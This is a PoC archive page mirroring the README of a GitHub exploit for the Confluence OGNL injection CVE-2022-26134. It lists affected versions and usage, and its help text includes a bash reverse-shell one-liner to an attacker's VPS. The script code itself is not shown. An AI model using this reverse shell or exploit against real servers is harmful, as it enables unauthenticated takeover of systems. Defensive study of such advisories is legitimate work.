Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1325 CNY

100%
Buy Us a Coffee

CVE-2022-26134 PoC — Atlassian Confluence Server 注入漏洞

Source
https://github.com/keven1z/CVE-2022-26134
Associated Vulnerability
Title:Atlassian Confluence Server 注入漏洞 (CVE-2022-26134)
Description:In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.
Description
远程攻击者在Confluence未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,在现有脚本上修改了poc,方便getshell。
Readme

# CVE-2022-26134
远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,修改poc,方便getshell。常见端口:8090

## 影响版本
* Confluence Server and Data Center >= 1.3.0
* 7.14.0 <= Confluence Server and Data Center < 7.4.17
* 7.13.0 <= Confluence Server and Data Center < 7.13.7
* 7.14.0 <= Confluence Server and Data Center < 7.14.3
* 7.15.0 <= Confluence Server and Data Center < 7.15.2
* 7.16.0 <= Confluence Server and Data Center < 7.16.4
* 7.17.0 <= Confluence Server and Data Center < 7.17.4
* 7.18.0 <= Confluence Server and Data Center < 7.18.1

## 使用说明
```
pip3 install requests
```

```shell
	   ______     _______     ____   ___ ____  ____      ____   __   _ _____ _  _   
  / ___\ \   / | ____|   |___ \ / _ |___ \|___ \    |___ \ / /_ / |___ /| || |  
 | |    \ \ / /|  _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_ 
 | |___  \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__   _|
  \____|  \_/  |_____|   |_____|\___|_____|_____|   |_____|\___/|_|____/   |_|  
    
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND

CVE-2022-26134

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标URL
  -c COMMAND, --command COMMAND
                        执行命令(execute command),get shell:/bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1
```
## 使用
```shell
python3 CVE-2022-26134.py -t [server ip] -c [command] //执行命令
```

此脚本仅可用于测试使用,勿作他用
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →